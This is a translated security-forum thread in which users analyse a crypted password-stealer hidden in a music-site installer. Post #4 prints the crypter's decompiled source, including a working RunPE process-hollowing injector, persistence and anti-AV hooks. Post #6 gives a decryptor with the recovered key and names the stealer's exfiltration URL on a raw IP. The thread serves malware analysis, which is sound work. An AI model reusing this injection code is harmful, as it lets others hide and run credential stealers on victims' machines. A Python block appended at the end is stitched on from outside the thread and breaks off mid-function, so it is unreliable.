Win32.Trojan-Downloader.MSIL.Agent.xf.3.a

This thread in the forum "Viren, Trojaner & Malware" was started by Decryptor, 18 February 2011.

  #1 18 February 2011
    Last edited by a moderator: 14 April 2017
    okay, apparently you can't even trust your favourite music site anymore

    anyway, ran it today with admin rights, which is normal for installations; I was puzzled by the bin files that were only there as decoration

    I have Win7 64-bit

    Antivirus scan for 41dc79c0b1fb809cc4dcd00b7870d1d33dbf399120dc5bfe23f4aeee1e2d4ce9 at 2011-02-17 23:59:07 UTC - VirusTotal


    Code:
    Logfile of Trend Micro HijackThis v2.0.4
    Scan saved at 01:20:05, on 18.02.2011
    Platform: Windows 7 (WinNT 6.00.3504)
    MSIE: Internet Explorer v8.00 (8.00.7600.16722)
    Boot mode: Normal
    
    Running processes:
    C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe
    C:\Program Files (x86)\Trillian\trillian.exe
    C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
    C:\Program Files (x86)\DivX\DivX Plus Web Player\DDMService.exe
    C:\Program Files (x86)\xchat\xchat.exe
    C:\Program Files (x86)\Last.fm\LastFM.exe
    C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
    C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
    C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
    C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWTray.exe
    C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
    C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
    C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe
    C:\Users\****\Downloads\HiJackThis204.exe
    
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
    F2 - REG:system.ini: UserInit=userinit.exe
    O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
    O2 - BHO: Increase performance and video formats for your HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll
    O2 - BHO: Use the DivX Plus Web Player to watch web videos with less interruptions and smoother playback on supported sites - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll
    O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\Microsoft Office\Office14\GROOVEEX.DLL
    O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\Microsoft Office\Office14\URLREDIR.DLL
    O2 - BHO: Ask Toolbar BHO - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
    O2 - BHO: Microsoft-Webtestaufzeichnung 10.0-Hilfsprogramm - {DDA57003-0068-4ed2-9D32-4D1EC707D94D} - C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll
    O3 - Toolbar: Foxit Toolbar - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
    O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
    O4 - Startup: Trillian.lnk = C:\Program Files (x86)\Trillian\trillian.exe
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\Microsoft Office\Office14\EXCEL.EXE/3000
    O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~2\Microsoft Office\OFFICE11\EXCEL.EXE/3000
    O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\Microsoft Office\Office14\ONBttnIE.dll/105
    O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
    O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
    O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
    O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
    O9 - Extra button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O9 - Extra 'Tools' menuitem: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\Microsoft Office\OFFICE11\REFIEBAR.DLL
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\Skype4COM.dll
    O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
    O23 - Service: Ati External Event Utility - Unknown owner - C:\Windows\system32\Ati2evxx.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
    O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
    O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
    O23 - Service: FLEXnet Licensing Service 64 - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe
    O23 - Service: LogMeIn Hamachi 2.0 Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
    O23 - Service: HASP License Manager (hasplms) - Unknown owner - C:\Windows\system32\hasplms.exe (file missing)
    O23 - Service: HTTP Debugger (HTTPDebugger) - MadeForNet.com - C:\Program Files (x86)\HTTP Debugger Pro\mfnsvc.exe
    O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
    O23 - Service: KMService - Unknown owner - C:\Windows\system32\srvany.exe
    O23 - Service: Lavasoft Ad-Aware Service - Lavasoft Limited - C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWService.exe
    O23 - Service: Process Monitor (LVPrcS64) - Logitech Inc. - C:\Program Files\Common Files\Logishrd\LVMVFM\LVPrcSrv.exe
    O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files (x86)\McAfee Security Scan\2.0.181\McCHSvc.exe
    O23 - Service: mental ray 3.8 Satellite for Autodesk 3ds Max Design 2011 32-bit 32-bit (mi-raysat_3dsmax2011_32) - Unknown owner - C:\Program Files (x86)\Autodesk\3ds Max Design 2011\mentalimages\satellite\raysat_3dsmax2011_32server.exe
    O23 - Service: mental ray 3.8 Satellite for Autodesk 3ds Max Design 2011 64-bit 64-bit (mi-raysat_3dsmax2011_64) - Unknown owner - C:\Program Files\Autodesk\3ds Max Design 2011\mentalimages\satellite\raysat_3dsmax2011_64server.exe
    O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
    O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
    O23 - Service: NIHardwareService - Native Instruments GmbH - C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
    O23 - Service: PACE License Services (PaceLicenseDServices) - PACE Anti-Piracy, Inc. - C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
    O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
    O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
    O23 - Service: Sage Registry Service (Registry) - Sage KHK Software - C:\Program Files (x86)\Common Files\Sage KHK Shared\REGISTRY.EXE
    O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
    O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
    O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
    O23 - Service: SwitchBoard - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
    O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
    O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
    O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
    O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
    O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
    
    --
    End of file - 11312 bytes
    

    the exe in question
    No File | www.xup.in
     

  #2 18 February 2011
    Re: what is it, what does it do?

    VM on -> Wireshark on -> run Setup.exe -> look at the changed files -> look at the Wireshark log -> [what is it, what does it do] (a debugger would also be quite handy, but that requires prior knowledge -> code analysis)

    regards

    PS: I would remove my account name from the log..
    PS2: By the way, the author is registered on hackforums.net, at least that's where he cobbles his code together from..

    //edit: Log looks clean.

    Code injection into avcenter.exe
    Autostart via Registry SOFTWARE\Microsoft\Windows\CurrentVersion\Run (\temp.exe?)
    "Crypted" via the $10 BlackBloodCrypter2.2 and Base64^^
    ...
     
  #3 18 February 2011
    Re: what is it, what does it do?

    don't have a temp.exe
    according to OllyDbg it first kills the AVs, well, let it run in the VM, it messes with 3 files according to Sandboxie

    under the XP VM it doesn't even run
    Win7 VM opens explorer, leaves nothing in windir or autostart

    no data flowing, just sniffed it with Wireshark, crazy thing
     
  #4 18 February 2011
    Re: what is it, what does it do?

    A copy/paste kiddie crypter was used there... not really worth starting Wireshark, just look at the source code:

    Code:
    public static void Main()
    {
        ResourceManager manager = new ResourceManager("TempRes", Assembly.GetExecutingAssembly());
        byte[] inArray = (byte[]) manager.GetObject("crypted");
        string newValue = manager.GetString("settings");
        BindedData = manager.GetString("bind");
        RunPE = manager.GetString("runpe");
        char ch = '%';
        string[] strArray = newValue.Split(new char[] { ch });
        string str8 = strArray[4];
        string str2 = strArray[5];
        string str = strArray[3];
        string str6 = strArray[11];
        string str4 = strArray[6];
        string str3 = strArray[10];
        string str5 = strArray[12];
        if (str3 == "1")
        {
            OnlineSub(); // checks whether an internet connection is up
        }
        if (str == "1")
        {
            Daanteys.Enable(); // anti AV/VM/sandbox
        }
        if (str2 == "1")
        {
            Thread thread = new Thread(new ThreadStart(Stub.BindSub));
            thread.IsBackground = true;
            thread.Start();
        }
        if (str8 == "1")
        {
            AddStartUp();
        }
        RunPE = RunPE.Replace("%%CDATA%%", CD.format(Convert.ToBase64String(inArray))); // the actual malware payload
        RunPE = RunPE.Replace("%%Settings%%", newValue);
        if (str5 == "DefBrw")
        {
            str5 = defaultbrowser();
        }
        RunPE = RunPE.Replace("%%INJECT%%", str5);
        Execute(RunPE); // run in memory
        if (str4 == "1")
        {
            switch (strArray[7])
            {
                case "":
                    Interaction.MsgBox(strArray[8], MsgBoxStyle.Critical, strArray[9]);
                    goto Label_023D;

                case "Exclamation":
                    Interaction.MsgBox(strArray[8], MsgBoxStyle.Exclamation, strArray[9]);
                    goto Label_023D;

                case "Critical":
                    Interaction.MsgBox(strArray[8], MsgBoxStyle.Critical, strArray[9]);
                    goto Label_023D;

                case "Question":
                    Interaction.MsgBox(strArray[8], MsgBoxStyle.Question, strArray[9]);
                    break;

                case "Information":
                    Interaction.MsgBox(strArray[8], MsgBoxStyle.Information, strArray[9]);
                    break;
            }
        }
    Label_023D:
        if (str6 == "1")
        {
            MeltME(); // deletes itself
        }
    }
    
    The settings are the following:
    Code:
    9%AES%cFwmeodjIGLViDo%0%0%0%0%Critical%%%0%0%explorer.exe%
    The method that executes the actual malicious program is compiled on the fly, and its source looks like this:
    Code:
    Imports System.Text
    Imports System.Runtime.InteropServices
    Imports System
    Imports Microsoft.VisualBasic
    Imports System.ComponentModel
    Imports System.IO.Compression
    Imports System.IO
    
    Namespace Inject
    Public Class RunPE
    
    Public Shared Function DoStuff() As Boolean
    
    Dim Setting As String = "%%Settings%%"
    
    Dim FileSplit As Char = "%%BlackBloodCrypter2.2%%"
    
    Dim SplitedData() as String = Setting.Split(FileSplit)
    
     Dim Password As String = SplitedData(2)
    
     Dim Encryption As String = SplitedData(1)
    
     Dim CryptData As String = %%CDATA%%
    
     Dim InjectInto as String = "%%INJECT%%"
     
     If Environment.OSVersion.Platform.ToString.Contains("32") OrElse Environment.OSVersion.Platform.ToString.Contains("86") Then
     If Encryption = "RC4" Then
     InjectPE(RC4(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     ElseIf Encryption = "AES" Then
     InjectPE(AES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     ElseIf Encryption = "DES" Then
     InjectPE(DES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     ElseIf Encryption = "RC2" Then
     InjectPE(RC2_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     ElseIf Encryption = "STR" Then
     InjectPE(Crypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     ElseIf Encryption = "TDES" Then
     InjectPE(TDES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     End If
     Else
     If Encryption = "RC4" Then
     InjectPE(RC4(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     ElseIf Encryption = "AES" Then
     InjectPE(AES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     ElseIf Encryption = "DES" Then
     InjectPE(DES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     ElseIf Encryption = "RC2" Then
     InjectPE(RC2_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     ElseIf Encryption = "STR" Then
     InjectPE(Crypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     ElseIf Encryption = "TDES" Then
     InjectPE(TDES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     End If
     End If
    Return True
    End Function
     Public Shared Function AES_Decrypt(ByVal input As Byte(), ByVal pass As Byte()) As Byte()
     Dim AES As New System.Security.Cryptography.RijndaelManaged
     Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
     Dim decrypted() As Byte
     Try
     Dim hash(31) As Byte
     Dim temp As Byte() = Hash_AES.ComputeHash(pass)
     Array.Copy(temp, 0, hash, 0, 16)
     Array.Copy(temp, 0, hash, 15, 16)
     AES.Key = hash
     AES.Mode = Security.Cryptography.CipherMode.ECB
     Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor
     Dim Buffer As Byte() = input
     decrypted = DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
     Return decrypted
     Catch ex As Exception
     Return Nothing
     End Try
     End Function
    .....
     <DllImport("kernel32")> _
     Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
     ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
     End Function
     <DllImport("kernel32")> _
     Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
     End Function
     <DllImport("ntdll")> _
     Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
     End Function
     <DllImport("kernel32")> _
     Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
     End Function
     <DllImport("kernel32.dll")> _
     Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger
     End Function
     Declare Function usegfsuiefgseuf Lib "kernel32" Alias "SetThreadContext" (ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
     <DllImport("kernel32")> _
     Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
     End Function
     <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
     Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
     End Function
     <DllImport("kernel32.dll", SetLastError:=True)> _
     Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
     End Function
    
     Public Shared Function InjectPE(ByVal bytes() as Byte, ByVal InjectInto as String) As Boolean
     Try
     Dim procAttr As IntPtr = IntPtr.Zero
     Dim processInfo As IntPtr() = New IntPtr(3) {}
     Dim startupInfo As Byte() = New Byte(67) {}
    
     Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
     Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
     Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))
    
     If CreateProcess(Nothing, New StringBuilder(InjectInto), procAttr, procAttr, False, 4, _
     procAttr, Nothing, startupInfo, processInfo) Then
     Dim ctxt As UInteger() = New UInteger(178) {}
     ctxt(0) = &H10002
     If GetThreadContext(processInfo(1), ctxt) Then
     Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)
    
     Dim buffer__1 As IntPtr = IntPtr.Zero
     Dim bufferSize As New IntPtr(4)
    
     Dim numRead As IntPtr = IntPtr.Zero
    
     If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
     Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
     Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
     Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40)
    
     Dim lpNumberOfBytesWritten As Integer
    
     WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
     Dim num5 As Integer = num - 1
     For i As Integer = 0 To num5
     Dim dst As Integer() = New Integer(9) {}
     Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
     Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
     Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)
     addr = New IntPtr(buffer2.Length)
     size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
     WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
     Next
     size = New IntPtr(ctxt(&H29) + 8L)
     addr = New IntPtr(4)
    
     WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
     ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
     usegfsuiefgseuf(processInfo(1), ctxt)
     End If
     End If
     ResumeThread(processInfo(1))
     End If
     Catch
     Return False
     End Try
     Return True
     End Function
    
    What's interesting is which exe it gets injected into, but you can see that clearly in the source code...

    Now how do you get at the malware in an elegant way? Very simple: copy the decisive method (AES_Decrypt), drop it into Visual Studio and decrypt the exe with the given password...

    Hmpf, no room left for the actual malware -> RR post character limit :lol:
     
  #5 18 February 2011
    Re: what is it, what does it do?

    I'm somehow too dumb for this right now; what does it do / what has it done, and how do I get rid of it again?
     
  #6 18 February 2011
    Re: what is it, what does it do?

    decrypt method in C#:

    Code:
    using System;
    using System.IO;
    using System.Security.Cryptography;
    using System.Text;

    class Program
    {
        static void Main(string[] args)
        {
            string pathInput = @"C:\Users\Admin\Downloads\crypted";
            string pathOutput = @"C:\Users\Admin\Downloads\crypted.exe";
            string password = "cFwmeodjIGLViDo";

            byte[] buffer;
            using (BinaryReader b = new BinaryReader(File.Open(pathInput, FileMode.Open)))
            {
                buffer = b.ReadBytes((int)b.BaseStream.Length);
            }

            // Key derivation copied 1:1 from the stub's AES_Decrypt: the MD5 digest is
            // written at offset 0 and again at offset 15 of a 32-byte buffer, so byte 15
            // is overwritten and byte 31 stays zero. It must be reproduced exactly.
            RijndaelManaged rj = new RijndaelManaged();
            MD5CryptoServiceProvider crp = new MD5CryptoServiceProvider();
            byte[] hash = crp.ComputeHash(Encoding.Default.GetBytes(password));
            byte[] hashpw = new byte[32];
            Array.Copy(hash, 0, hashpw, 0, 16);
            Array.Copy(hash, 0, hashpw, 15, 16);
            rj.Key = hashpw;
            rj.Mode = CipherMode.ECB;
            ICryptoTransform transform = rj.CreateDecryptor();
            byte[] decrypted;
            try
            {
                decrypted = transform.TransformFinalBlock(buffer, 0, buffer.Length);
            }
            catch (CryptographicException ex)
            {
                // wrong password or mode: report and stop instead of writing a null buffer
                Console.WriteLine(ex.ToString());
                Console.Read();
                return;
            }
            using (BinaryWriter writeBinary = new BinaryWriter(new FileStream(pathOutput, FileMode.Create)))
            {
                writeBinary.Write(decrypted);
            }
        }
    }
    VirusTotal scan of the decrypted exe:

    Antivirus scan for 26bb9902c8cf721300929c7d967dc989b736d4572fbca8fa607eb5e11fd5daac at 2011-02-18 19:46:34 UTC - VirusTotal

    At a quick glance I'd say:
    There's a very good password stealer (construction kit!) in there. The data is sent to a PHP script:
    Code:
    http://46.182.124.42/index2.php
    The stealer also detects whether Wireshark is running!

    It probably doesn't embed itself in the system, but e.g. your Firefox passwords are now with the kiddie.

    Still, go through your autostart list with Autoruns from Sysinternals.
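As an added analyst-side example (not code from this thread or from the crypter's author): the settings layout from the decompiled stub in #4 and the key-derivation quirk of its AES_Decrypt method, written in Python so the payload can be unpacked without Visual Studio. The field names, the ASCII handling of the password and the use of the `cryptography` package in `decrypt_payload` are assumptions of mine.

```python
import hashlib

# Positions inside the '%'-separated settings string, taken from the
# strArray[] indices in the decompiled C# stub and SplitedData() in the
# VB.NET RunPE source quoted in this thread (field names are my own).
FIELDS = {
    1: "encryption",     # RC4 / AES / DES / RC2 / STR / TDES
    2: "password",       # key material for the payload decryption
    3: "anti_analysis",  # "1" -> Daanteys.Enable() (anti AV/VM/sandbox)
    4: "add_startup",    # "1" -> AddStartUp()
    5: "bind",           # "1" -> Stub.BindSub thread (bound decoy file)
    6: "show_msgbox",    # "1" -> fake message box after injection
    7: "msgbox_style",
    8: "msgbox_text",
    9: "msgbox_title",
    10: "online_check",  # "1" -> OnlineSub()
    11: "melt",          # "1" -> MeltME() (stub deletes itself)
    12: "inject_into",   # RunPE host process, "DefBrw" = default browser
}


def parse_settings(settings: str) -> dict:
    """Map the crypter's settings string to named options."""
    parts = settings.split("%")
    if len(parts) <= max(FIELDS):
        raise ValueError("settings string has %d fields, expected at least %d"
                         % (len(parts), max(FIELDS) + 1))
    return {name: parts[idx] for idx, name in FIELDS.items()}


def derive_key(password: bytes) -> bytes:
    """Reproduce the stub's 32-byte AES key exactly.

    AES_Decrypt copies the 16-byte MD5 digest to offset 0 and again to
    offset 15 of a zeroed 32-byte buffer, so the second copy overwrites
    byte 15 and byte 31 is never written: digest[:15] + digest + one zero
    byte. A decryptor in any other language must do the same or it fails.
    """
    digest = hashlib.md5(password).digest()
    key = bytearray(32)
    key[0:16] = digest
    key[15:31] = digest
    return bytes(key)


def strip_pkcs7(data: bytes, block: int = 16) -> bytes:
    """Remove the PKCS#7 padding that RijndaelManaged strips in TransformFinalBlock."""
    if not data or len(data) % block:
        raise ValueError("ciphertext length is not a multiple of the block size")
    n = data[-1]
    if not 1 <= n <= block or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding: wrong password or not the AES mode")
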